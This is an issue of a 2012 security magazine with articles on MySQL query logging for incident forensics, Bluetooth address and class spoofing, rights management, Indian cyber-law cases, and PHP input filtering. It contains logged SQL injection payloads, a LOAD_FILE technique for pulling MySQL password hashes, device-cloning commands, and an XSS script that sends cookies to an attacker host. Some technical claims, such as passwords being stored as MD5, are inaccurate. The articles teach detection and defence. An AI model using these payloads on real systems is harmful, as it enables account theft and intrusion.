Hacking Magazine: Issue 34 – Nov2012
Issue34 – Nov2012 | Page-1
Logging in MySQL
Introduction
This article demonstrates logging techniques in MySQL that let you uncover and analyze mischief attempted by an (outside or inside) user, focusing on specific areas of the database.
What you will learn
In this article I am going to talk about how logging is done in MySQL, and all the places to look for information about the queries executed by clients of the MySQL database.
Pre-requisites
The reader must have basic working knowledge of MySQL and of the operating system to follow the technical details in this article.
Getting Started
Following are the types of logs available in MySQL:

Log type            Information written to log
Error log           Problems encountered starting, running, or stopping mysqld
General query log   Established client connections and statements received from clients
Binary log          Statements that change data (also used for replication)
Relay log           Data changes received from a replication master server
Slow query log      Queries that took more than long_query_time seconds to execute
By default, logging is not enabled in MySQL. Before enabling it, use the command "show processlist":

mysql> show processlist;

Note: This shows all running queries. The Info column in the result shows the query being executed.

Figure 1: processlist output
Now this is only showing data for the current session. If you want to see all the queries being executed on the server, you should log them first.

We have seen the different types of logging in MySQL, so which one should we use? We will use the General Log, which gives us all the queries executed on the server.

How to go about it?
- Check whether logging is enabled or not
- What type of logging is enabled (FILE, TABLE, BOTH)?
- If not enabled, how to enable it?
- What to check?

Checking whether logging is enabled or not
Simply log into the MySQL prompt and issue the following command:

mysql> show variables;

This lists all the global variables in MySQL. Look for the general_log variable and its value; if logging is not enabled, its value will be "OFF" and the general_log_file variable will be:

For *NIX: "/var/lib/mysql/mysql.log"
For Windows (XAMPP setup): "C:\xampp\mysql\data\<system_name>.log"

What type of logging is enabled (FILE, TABLE, BOTH)?
You can determine which type of logging is in use by looking at the output of the following variable:

log_output = 'FILE|TABLE|BOTH'

You can change the value using the following command:

mysql> SET GLOBAL log_output = 'FILE';

Figure 2: All available variables in MySQL
If logging is not enabled, how to enable it?
As logging is not enabled, let's enable it first. To do that, issue the following commands:

mysql> SET GLOBAL general_log = 'ON';
mysql> SET GLOBAL general_log_file = 'path_on_your_system';

Similarly you can enable the slow query log:

mysql> SET GLOBAL slow_query_log = 'ON';
mysql> SET GLOBAL slow_query_log_file = 'path_on_your_system';

Slow query logs record those queries which took longer to execute than the value specified in "long_query_time".
What to check?
So, we have all the required logs. What next? Let's analyze.

What could be wrong?
- It could be an attack from the web, the most common being SQL Injection.
- What about somebody from inside? Privilege escalation or data stealing?

In both cases, who did it? Let's find out.
Case 1:
Suppose somebody found a weak link in the application and got into the system through SQL Injection. I don't have to explain what SQL Injection is, but I can tell you what someone can do with it. For the attacker there can be only one entry point, but in the backend there are many components, like the web server, the database server, etc.

Let's look at the web server log (in our case, the Apache logs). During normal operations, things look pretty simple and straightforward. At a glance it looks neat and clean.

Let's search for something like "select", in case anyone is trying to run a SQL query. Similarly we can search for "union" or any other such SQL command to see if any suspicious activity is going on.
Figure 3: Apache access log using Xpolog
Figure 4: Filtering log on "select" command
It is interesting to see that we have some requests which carry SQL queries in the request parameters. There is something suspicious about these requests: the timestamp is the same for several of them, which means the attacker ran an automated scanner to exploit the vulnerability.
Suspicious log snippet:
127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28version%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 39 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40hostname+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40basedir+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
Figure 5: Filtering log on "union" command
Once you are sure that there is an incident of SQL Injection from an unknown IP, you can proceed with the formal procedure of investigating the issue with the cyber cell.
Case 2:
Now let's consider the second case, where a MySQL user who has access to the database has done some mischief. Popular activities possible are:
- Running privilege escalation attacks
- Getting the root password (we will see how)
- Dumping database(s) into files

Note: There are a few privilege escalation attacks available in Metasploit as well.

Getting the root password is fairly simple. A low-privilege user just has to execute the following command at the prompt:

mysql> SELECT LOAD_FILE('C:\xampp\mysql\data\mysql\user.MYD');

Note: The path will change as per the setup. If you are not getting any result, then you need some other access to this file: physical access, ssh, RDP, etc. Basically we just need the data of this file.

This is a binary file containing the MySQL user information with username and password. So if you are the root user, you can simply run the following query to see all users:

mysql> select Host, User, Password from mysql.user;

Figure 6: Users table in MySQL

When the low-privilege user (fdb in our case) tries to run this query, he will obviously get an access denied error. At this point our previous query, reading the binary file, will be handy. So, what is the problem now? Simple, the password is stored as an MD5 hash. Cracking this would not take much time.

Note: Tools like md5crack, John the Ripper and Cain & Abel do a fine job of cracking MD5 hashes.

Considering the last part, where a user is dumping the database into a file for some notorious purpose, we can check our general_log or slow_query_log for such queries. In this case we open the log file and do some manual analysis first.

Here is a snippet of the query log:
325 Connect root@localhost on
325 Init DB forensics
325 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x'
325 Quit
326 Connect root@localhost on
326 Init DB forensics
326 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 4,1),0x31303235343830303536 and 'x'='x'
326 Quit
327 Connect root@localhost on
327 Init DB forensics
327 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 5,1),0x31303235343830303536 and 'x'='x'
327 Quit
328 Connect root@localhost on
328 Init DB forensics
328 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 6,1),0x31303235343830303536 and 'x'='x'
328 Quit
329 Connect root@localhost on
329 Init DB forensics
329 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 7,1),0x31303235343830303536 and 'x'='x'
329 Quit
330 Connect root@localhost on
330 Init DB forensics
330 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 8,1),0x31303235343830303536 and 'x'='x'
330 Quit
What we basically search for is statements like "union select", queries to the "information_schema" database, queries to the "mysql" database, etc. Then we analyze them further to reach a conclusion.
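An added example, not from the article: a Python parser for the general query log in the simplified "<id> Command Argument" form shown above. It rebuilds each connection's session (user, database, statements) and flags the statements the paragraph says to search for (union select, information_schema, the mysql database), plus LOAD_FILE reads and INTO OUTFILE writes from the two Case 2 scenarios. The sample log is constructed: session 325 is the one quoted above, sessions 324, 326 and 327 are made up for this example (326 reuses the two statements the text discusses).

```python
import re

# Constructed sample in the simplified layout used in the article (no time column).
SAMPLE_GENERAL_LOG = r"""
324 Connect app@localhost on
324 Init DB forensics
324 Query SELECT * FROM forensics_test where uname = 'alice'
324 Quit
325 Connect root@localhost on
325 Init DB forensics
325 Query SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x'
325 Quit
326 Connect fdb@localhost on
326 Query SELECT LOAD_FILE('C:\xampp\mysql\data\mysql\user.MYD')
326 Query select Host, User, Password from mysql.user
326 Quit
327 Connect app@localhost on
327 Init DB forensics
327 Query SELECT *
    FROM forensics_test
    INTO OUTFILE '/tmp/forensics_dump.txt'
327 Quit
"""

# "<connection id> <command> <argument>"; command names are MySQL's own.
EVENT_RE = re.compile(
    r"^\s*(?P<id>\d+)\s+(?P<cmd>Init DB|Connect|Query|Quit|Prepare|Execute|Field List)\s*(?P<arg>.*)$"
)

# Signals the article says to look for, plus file read/write, which is how data
# leaves the server in its "dumping database(s) into files" case.
SIGNALS = [
    ("union select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("mysql system db", re.compile(r"\bmysql\.(user|db|tables_priv)\b", re.I)),
    ("file read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]


def parse_events(log_text):
    """Return (connection id, command, argument) tuples. A statement that spans
    several lines has continuation lines without an id; they are glued onto the
    preceding Query (a continuation line that itself starts with digits would be
    misread, so the log's raw form should be checked when a flag looks odd)."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = EVENT_RE.match(line)
        if m:
            events.append([int(m["id"]), m["cmd"], m["arg"].strip()])
        elif events and events[-1][1] == "Query":
            events[-1][2] += " " + line.strip()
        # any other unmatched line (e.g. the file header) is ignored
    return [tuple(e) for e in events]


def sessions(log_text):
    """Rebuild one session per connection id: who connected, which database, what ran."""
    by_id = {}
    for cid, cmd, arg in parse_events(log_text):
        s = by_id.setdefault(cid, {"id": cid, "user": None, "db": None,
                                   "queries": [], "flags": set()})
        if cmd == "Connect":
            s["user"] = arg.split()[0] if arg else None   # "user@host on [db]"
        elif cmd == "Init DB":
            s["db"] = arg
        elif cmd in ("Query", "Execute"):
            s["queries"].append(arg)
            s["flags"].update(name for name, rx in SIGNALS if rx.search(arg))
    return [by_id[k] for k in sorted(by_id)]


def suspicious(log_text):
    """Sessions with at least one flagged statement, in connection-id order."""
    return [s for s in sessions(log_text) if s["flags"]]


if __name__ == "__main__":
    for s in suspicious(SAMPLE_GENERAL_LOG):
        print(f"conn {s['id']} {s['user']} db={s['db']} flags={sorted(s['flags'])}")
```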
Conclusion
Logging alone will not do the job; it is also important to do the analysis afterwards. Frequently, database administrators only enable the logging features and leave it at that. But the actual analysis behind it is much more important. One thing that I shouldn't be mentioning is that, using this technique, you can extract all the queries used by an automated scanner like Havij, SQLMap, etc. I personally do not recommend that, but once you know the queries these tools run you will better understand SQL Injection.
Dhiraj Ranka [email protected]
Dhiraj Ranka has been working as a Senior Security Analyst at NII Consulting, Mumbai for more than four years. He is additionally involved in intensive research and web application testing, primarily for executing vulnerability assessment projects and delivering trainings.
Cloning Bluetooth Device
[Note: This demonstration is based on the article "Bluetooth Reconnaissance – Watching over Invisible". Please go through it before moving forward.]

In the previous section we saw how to find devices which are in visible as well as invisible mode using different tools, and also understood the different terms we get during the scanning process. Here we will recall one scan result.

So here, in the first block, the Bluetooth addresses are given, then the clock offset and then the class information. By looking at the class information we can conclude which kind of device we have scanned.

In this section let's play with our own Bluetooth interfaces, so that we can prepare them for the attack.

Initial State:
The above screenshot shows the initial configuration of my hci1 external Bluetooth dongle. Look especially at BD_ADDR, Name and Class.

Basic and most important, first we will change the BD_ADDR of the device:
#bdaddr -i hci1 <new_bd_addr>
Like hci1, we can change the address of all our Bluetooth devices as we want. In the above screenshot, you can see that the BD_ADDR of both hci0 and hci1 is changed:
hci0 to AA:AA:AA:AA:AA:AA
hci1 to BB:BB:BB:BB:BB:BB

Now, rather than changing the address to all A's or all B's, we can clone our device to any other Bluetooth device.
First scan the air:
#hcitool scan
Why not pick up the Android BD_ADDR?
#bdaddr -i hci1 <BD_ADDR>
You can cross-check the configuration by:
#hciconfig -a
So now we have successfully changed the BD_ADDR. An interesting note: once the BD_ADDR is changed, it remains changed forever.
Now let's change our device name:
#hciconfig hci1 name "android"
You can cross-check again and verify that the name is also changed.
So now, will our Bluetooth device act as a phone? The answer is no. Observe the class field: it is still 0x000000. Let's change its services too:
#hciconfig hci1 class 0x58020c
Now you can clearly see that we have changed the BD_ADDR, name and class of our device as we wished.
With these settings, when a scan is made from a smartphone, bt-0 is the default Bluetooth interface to which we didn't make any changes, and the name "android" is nothing but the hci1 dongle, which we converted into an Android smartphone.
The question is, why make these changes?
Basically, in certain premises, if a particular type of Bluetooth device is blocked or not allowed, we can simply move to any other device with just a few commands. The above settings also play a very important role in many attacks, which we will look at further.
Again the question is: while making these configuration changes, how do we find which class to move to?
URL: http://bluetooth-pentest.narod.ru/software/bluetooth_class_of_device-service_generator.html
Find the class of any device you want to pick up. As per your need, you can pick up any type of device with the services you want, as shown above.
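Added example, not part of the article: a Python decoder for the 24-bit Class of Device field that appears in the scan output recalled at the start of this section and in the hciconfig output above. It shows why 0x000000 does not look like a phone and what 0x58020c advertises (major/minor class and service bits), and parses hcitool inq lines (address, clock offset, class) from a constructed sample. Only the Computer and Phone minor-class tables are included; the names follow the Bluetooth assigned numbers.

```python
import re

# Major device classes (bits 8..12) and the minor classes (bits 2..7) for the
# two majors this section deals with; tables from the Bluetooth assigned numbers.
MAJOR_CLASSES = {
    0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network Access Point",
    4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable", 8: "Toy",
    9: "Health", 31: "Uncategorized",
}
MINOR_CLASSES = {
    1: {0: "Uncategorized", 1: "Desktop", 2: "Server", 3: "Laptop",
        4: "Handheld PC/PDA", 5: "Palm-size PC/PDA", 6: "Wearable computer", 7: "Tablet"},
    2: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
        4: "Wired modem or voice gateway", 5: "Common ISDN access"},
}
# Service class bits 13..23 (bits 14 and 15 are reserved).
SERVICE_BITS = {
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer", 21: "Audio",
    22: "Telephony", 23: "Information",
}


def decode_cod(cod):
    """Split a 24-bit Class of Device into format type, major, minor and services."""
    if not 0 <= cod <= 0xFFFFFF:
        raise ValueError("Class of Device is a 24-bit value")
    fmt = cod & 0x3              # format type; 0 is the only format defined
    minor = (cod >> 2) & 0x3F    # meaning depends on the major class
    major = (cod >> 8) & 0x1F
    services = [name for bit, name in sorted(SERVICE_BITS.items()) if cod & (1 << bit)]
    return {
        "format": fmt,
        "major": MAJOR_CLASSES.get(major, f"Reserved (0x{major:02x})"),
        "minor": MINOR_CLASSES.get(major, {}).get(minor, f"0x{minor:02x}"),
        "services": services,
    }


# One "hcitool inq" result line: address, clock offset, class.
INQ_RE = re.compile(
    r"(?P<bdaddr>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"clock offset:\s*0x(?P<clk>[0-9A-Fa-f]+)\s+class:\s*0x(?P<cod>[0-9A-Fa-f]{6})"
)


def parse_inquiry(text):
    """Decode every device in hcitool inq output. The class field is self-reported
    (this section shows how easily it is set), so the result is what the device
    claims to be, not what it is."""
    devices = []
    for m in INQ_RE.finditer(text):
        cod = int(m["cod"], 16)
        devices.append({
            "bdaddr": m["bdaddr"].upper(),
            "clock_offset": int(m["clk"], 16),
            "cod": cod,
            **decode_cod(cod),
        })
    return devices


# Constructed sample in hcitool inq layout: a phone-class device (made-up address)
# and the hci1 dongle from this section, BB:BB:BB:BB:BB:BB, before its class was set.
SAMPLE_INQUIRY = """\
Inquiring ...
\t00:11:22:33:44:55\tclock offset: 0x2ff9\tclass: 0x58020c
\tBB:BB:BB:BB:BB:BB\tclock offset: 0x0000\tclass: 0x000000
"""

if __name__ == "__main__":
    for dev in parse_inquiry(SAMPLE_INQUIRY):
        print(f"{dev['bdaddr']} 0x{dev['cod']:06x} -> {dev['major']} / {dev['minor']} "
              f"services={dev['services']}")
```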
Swaroop D. Yermalkar
Swaroop is a final year engineering student at M.I.T. College of Engineering, Pune. He is an enthusiast and hobbyist in Infosec.
Information Rights Management (IRM)
Information Rights Management is the set
of techniques and methods which protect
the highly sensitive information of the
organization irrespective of the file location
whether it resides "in" or "outside" the
corporate boundaries. This happens as the
permissions embedded inside the file don't
allow unauthorized access, modification,
copying or printing. This is typically done
for protection of financial documents,
intellectual property such as patents, design
blueprints and executive communications.
Broadly speaking, IRM addresses the fundamental problem left open by Data Leakage Prevention (DLP). DLP relies heavily on protecting sensitive files within the corporate network, typically at its end points. It protects data based on its location (directory, file server/database) or in transit, but doesn't give protection at a more granular level, i.e. the information contained in the file itself. IRM currently applies mainly to documents and emails in a typical corporate environment.

While DLP is a "transmission control" technology, IRM is a "usage control" technology.
Why do we need IRM?
The rationale for using IRM is that the
privacy information associated with data
must travel along with it. The copying of
that data must not lose the associated rights
to that information. Rights to modify,
update, restrict or even destroy that
information must be retained by the
individual it pertains to, even when a 3rd
party holds that information.
In a larger context, IRM helps organizations enforce the corporate policy governing the secure flow of highly sensitive data in the organization. File protections are defined and enforced based on the user's identity along with the corporate policy for a given class of data. The best way to protect information is to do it directly at the level of the information, and not at the level of the many systems which might change, transport or store the information.
What exactly can be achieved with IRM?
- Preventing restricted content from unauthorized modification, copying, printing or pasting
- Disabling the Print Screen feature in Microsoft Windows for taking snapshots of restricted content
- Restricting content exposure wherever it is sent
- Supporting file expiration, so that the contents of documents are rendered un-viewable (or viewable) automatically after a set time
- Full auditing of both access to documents and changes to the rights/policy by business users
What can't be prevented using IRM?
- Sensitive content being erased, stolen, captured or transmitted by malicious programs like Trojans, key loggers etc.
- Content being lost or corrupted due to virus infection
- Restricted content being hand-copied or retyped from a display screen
- An unauthorized person taking a digital photograph of the restricted content displayed on a screen
- Snapshots of restricted content taken with 3rd-party screen-capture tools
Are Digital Rights Management (DRM) and IRM the same thing?
Not really. Digital Rights Management (DRM) technologies are typically used by hardware manufacturers, publishers, copyright holders and individuals with the intent to limit the use of digital content and devices "after sale". It is specifically targeted at defeating rich media piracy, like Blu-ray, CDs, DVDs, tapes and records. In the United States, a legal mandate called the Digital Millennium Copyright Act (DMCA) exists which imposes criminal penalties on those who make available technologies whose primary purpose is to bypass content protection technologies.

The main focus of DRM is to defeat copyright infringement by putting "digital locks" on rich media (e.g. records, CDs, DVDs) in the business-to-customer domain, while IRM restricts itself to sensitive information exchange in the business-to-business domain, such as merger and acquisition plans, design blueprints, patents, financial statements, strategic business plans etc.
Key for IRM's successful implementation
The strength of IRM is typically reserved for very sensitive information that travels outside the organization, to vendors, suppliers, outsourced parties, partners etc. But the challenges of proper authentication are quite complex outside the enterprise. Here, three approaches must be used for effective implementation of enterprise IRM solutions:

Automating policy assignment
The more automated the policy assignment, the better the IRM implementation. This is because automation eliminates the human errors inherent in manual processes, which in turn makes it more effective. Automation can protect documents such as price lists, product specifications and manufacturing process descriptions. This works because if we let document authors be the sole arbiters of what to protect, it puts an unwelcome burden on them. They may neglect to do it correctly, consistently, or at all.
Organizations can automatically assign
policies to entire information groups such as
anything saved to a certain folder, content
of a certain type, or information that has
reached a particular stage in a workflow.
This saves time, ensures consistency, and is
the most efficient way to manage large
volumes of sensitive information with IRM.
Dynamic policy control
As business conditions evolve, IRM policies
that govern the use of content must evolve
as well. Regulatory changes will almost
always require modifications to information
policies such as patent expirations, litigation
settlements, mergers and acquisitions etc.
Dynamic policy control enables recipient
entitlements to be changed when individual
roles or business needs change, regardless
of where the content resides—even when its
location is unknown. Policies reside on a
policy server, not within the content. So
they can be changed or revoked at any time.
Rights can also be set to automatically
expire.
Discretionary policy application
In the enterprise, discretionary use of IRM is an option that should be used in addition to, rather than instead of, automated policy application.
Audit Trail
An audit trail is an unalterable,
chronological log of access to a system and a
record of additions, changes, and deletions
to information that system manages, which
lists the person accessing the system, and
the time of access, and the action taken.
Steps before Implementing IRM
So you are all set to implement an IRM solution in your company. But before that, answer this quick checklist:
- In which business areas is sensitive information frequently exchanged?
- What needs to be protected (documents, email etc.)?
- How will security policies be enforced to protect this sensitive information or communication?
- Who can use the information (people, groups)?
- What can a user do with that information (read, write, print or forward)?
- When can the user access the information (time duration and dates)?
- Where can the information be accessed from (in office, home)?
- What would be the consequences to the business if this information ended up in the wrong hands?
- Does the organization retain any employee, customer, or member information that could be used in identity theft if it were exposed, either through loss or theft?
Popular IRM Vendor List
- Seclore File Secure
- Microsoft Integrated Rights Management
- Boole Server
- Smart Cipher
- EMC IRM Product Suite
Challenges in IRM implementation

Lack of commitment by senior management
The biggest roadblock to successful IRM implementation is inadequate commitment from senior management. Management has to be convinced of, and made aware of, the value of information to the business. The consequences of losing sensitive information must be highlighted, such as loss of brand image and reputation, and losing client and stakeholder confidence. Unpleasant lawsuits may follow if the leakage of sensitive information is made public.

A common mistake made by senior managers during implementation is to delegate the entire IRM implementation to the IT team and not take much responsibility for it. It is important to note that IRM must be driven from the top by senior management, which alone can bring about a cultural change in the organization. Without their support, the implementation at best stays patchy and disorganized.
User unwillingness to change
IRM's restrictive nature and perceived usage hassles may not gel easily with users at first. Users must undergo a mandatory training and awareness workshop to help ease them through this process. The suggested methodology can be summarized as:

Methodology for managers to induce change in users
- Unfreezing: This step alters the forces on individuals sufficiently that they are motivated to opt for a change. It reduces user resistance through increased peer pressure to induce them to go for the change.
- Moving: This step presents the direction of the change and the actual practice of learning new attitudes.
- Refreezing: The final step forges the changed attitudes and learned skills in users.

A good practice is to train some of the people in the organization and nurture them as champions in the usage of IRM. It is better if at least one person from every department is included as part of the IRM implementation task force. This task force will work in close cooperation with the vendors/security team during the implementation process.

After the official implementation is over, these champions will provide the first point of reference and support for any issues arising in DLP to new users. Hence, user satisfaction increases and, consequently, resistance to adopting the new technology is lowered.
Miscellaneous Factors
External user authentication for partners, vendors, suppliers and outsourced parties must be strong enough and well formed. Any loose ends will damage the confidentiality of the information.

Most IRM products, like Microsoft's Windows Rights Management Services, are great for Windows and Office, but they are mainly for Microsoft apps. For apps like CAD or blueprints, other solutions are either from small vendors or very limited in scope.
Manas Deep [email protected]
Manasdeep currently serves as a
Security Analyst in the Technical
Assessment team at NII Consulting,
Mumbai. His work focuses on
conducting Security Audits,
Vulnerability Assessment and
Penetration Testing for NII‘s premier
clients.
He possesses strong analytical skills and likes to keep himself involved in learning new attack vectors, tools and technologies. He has a flair for technical writing and shares his thoughts on his blog "Experiencing Computing…" at http://manasdeeps.blogspot.in. He has also published information security paper(s) in the International Journal of Computer Science and Information Security (IJCSIS) along with various seminar / conference proceedings.
Landmark Cases Decided by the Adjudication Office U/Chapt. IX of the IT Act

(I) Shri. Thomas Raju Vs. The Branch Manager, ICICI Bank, Anna Nagar Branch, Chennai
Case decided by – the Adjudicating Officer, Government of Tamilnadu.
Civil Jurisdiction.
Petition No. 3 of 2011
Dated – 16th May, 2011

The Petitioner, an employee of a Chennai based IT company, suffered a loss of Rs. 1,62,800/- as a result of a phishing attack. The said amount was transferred to the account of another customer of ICICI Bank.

The Petitioner claimed that he had suffered a wrongful loss due to unauthorised access to his savings account at the Anna Nagar branch of ICICI Bank.

The Petitioner further claimed that he had suffered the loss as the bank had failed to exercise due diligence and to provide adequate checks and safeguards to prevent unauthorised access to his account. The bank had also not adhered to the KYC norms issued by the RBI.

The Adjudicating Officer directed ICICI Bank to pay damages to the Petitioner under Section 43 of the IT Act.

The following cases on the same subject matter were decided by the same authority –
(Note: only citations are provided below; full judgments can be downloaded from http://www.tn.gov.in/departments/it.html)

I) S. Umashankar Vs. ICICI Bank
Case decided by – the Adjudicating Officer, Government of Tamilnadu.
Civil Jurisdiction
Petition No. 2462 of 2008
Dated – 12th April, 2010
II) K.J. Jeevaka Arasu Vs. ICICI Bank
Case decided by – the Adjudicating Officer, Government of Tamilnadu.
Civil Jurisdiction
Petition No. 1/e-gov. I/2011
Dated – 6th April, 2011
Sagar Rahurkar
Sagar Rahurkar holds a Masters of Law, and is a Certified Fraud Examiner (CFE) and Certified Cyber Crime Investigator. He specializes in Cyber Laws, Fraud Examination, and Intellectual Property Law related issues. He has co-authored a book titled "Introduction to Cyber Crimes and Cyber Law".
Currently he works with Mahindra Special Services Group in Fraud Risk Management.
Automatic Request Filter in PHP
Filtering plays a very important role when you are thinking about securing your application against malicious attacks. Security is a very important aspect of developing a web application. There are several kinds of attacks that could be used to break into your web application, and what the hacker gets out of it varies with the kind of attack. Suppose you have a SQL injection vulnerability in your application: using it, an attacker can do lots of things, the simplest being getting information about the users registered in your web application. And when a hacker has information about your users he can do a lot of things. However, we are not going to discuss that in detail. Filtering does not let you fully secure your web application, but it does raise its level of security. The simplest attack that you can stop by request filtering is XSS. I will give you a step-by-step guide on how you can stop XSS in your web application using different techniques.
In this article we will try to answer some questions related to filtering:
- What is Filtering?
- Why is it required?
- How can we do request filtering in PHP?
- Why do we need to automate it?
- How can we automate it in PHP?

This is most helpful to someone who is seeking a quick reference to request filtering in PHP.
What is Filtering?
Filtering, in general terms, can be described as removing unwanted content from input, validating input data against some format, or converting your input data into some format so that your application does not behave in an unwanted manner.

There are two main types of filtering: validation and sanitization.
- Validation checks whether the data being filtered meets certain criteria. For example, we can validate whether an email id is valid, as it needs to follow a proper pattern.
- Sanitization either removes or encodes special characters which may not be desired in a certain string. An example of sanitization is encoding <script> into %3Cscript%3E. Why we need to do this is explained in the next section.
Why is Filtering Required?
Let‘s understand the importance of filtering
by a scenario:-
Suppose you have a web application in
which you have a Feedback section. A user
need not be a member of website and he can
post the feedback. Only the admin can view
the feedbacks. Now if proper validation has
not been done and user is able to post
malicious JavaScript also then there can be
a problem. How it can be a problem lets
understand it.
Suppose your application has some URL like:
www.mysite.com/feedback.php
A hacker has created an application which is used to store the cookies he has stolen. Now if proper validation is not done and your application is vulnerable to XSS, he can steal your credentials with JavaScript similar to this:
<script language="javascript">document.location="http://hackerSite.xyz/stealcookie.php?cookie="+document.cookie</script>
If your admin clicks on this, he will be redirected to the hacker's application, where the credentials carried in the cookies are stored. What the hacker can then do with the admin credentials depends on your application, but he is surely able to break into your web application, which should never happen.
Consider also a comment page which can be viewed by everyone. If a person posts a similar link and users happen to click on it, their accounts will be compromised, which is a serious problem. You might be storing sensitive information about users which, if it goes into the wrong hands, may create serious trouble for the users and for you.
In the next section we will look at how we can implement filtering in PHP.
How can we do Request filtering in PHP?
To do request filtering you should first be able to catch the request and then filter the data in each request attribute. I will explain how to capture all the requests in PHP and then two ways of filtering the request attributes.
Let us first understand how we can capture all the request attributes.
PHP has three key-value based arrays for handling requests: $_GET, $_POST and $_REQUEST.
$_GET holds all the attributes sent by the GET method.
$_POST holds all the attributes sent by the POST method.
$_REQUEST is a combination of $_GET and $_POST. However, I would suggest that you do not depend totally on $_REQUEST, as you might not get all attributes in $_REQUEST due to some server configurations.
Now, handling all of this takes only a small piece of code. I have written code for handling all GET attributes in a request; a similar approach should be used for $_POST and $_REQUEST.
if (!empty($_GET)) {
    foreach ($_GET as $key => $value) {
        // Filtering code to be put here
    }
}
Just change the name to $_POST and $_REQUEST in the foreach to implement it for the other two.
Now we will look at how we can do the filtering with two approaches.
1) Using htmlentities - htmlentities is a built-in PHP function that encodes HTML special characters into HTML entities, so < is converted to &lt;. When you do this the browser will still display it as <, but it prevents the browser from interpreting it as HTML, and so JavaScript will not be executed.
Here is the code for implementing htmlentities:
$_GET[$key] = htmlentities($value);
Just put this code inside the foreach loop.
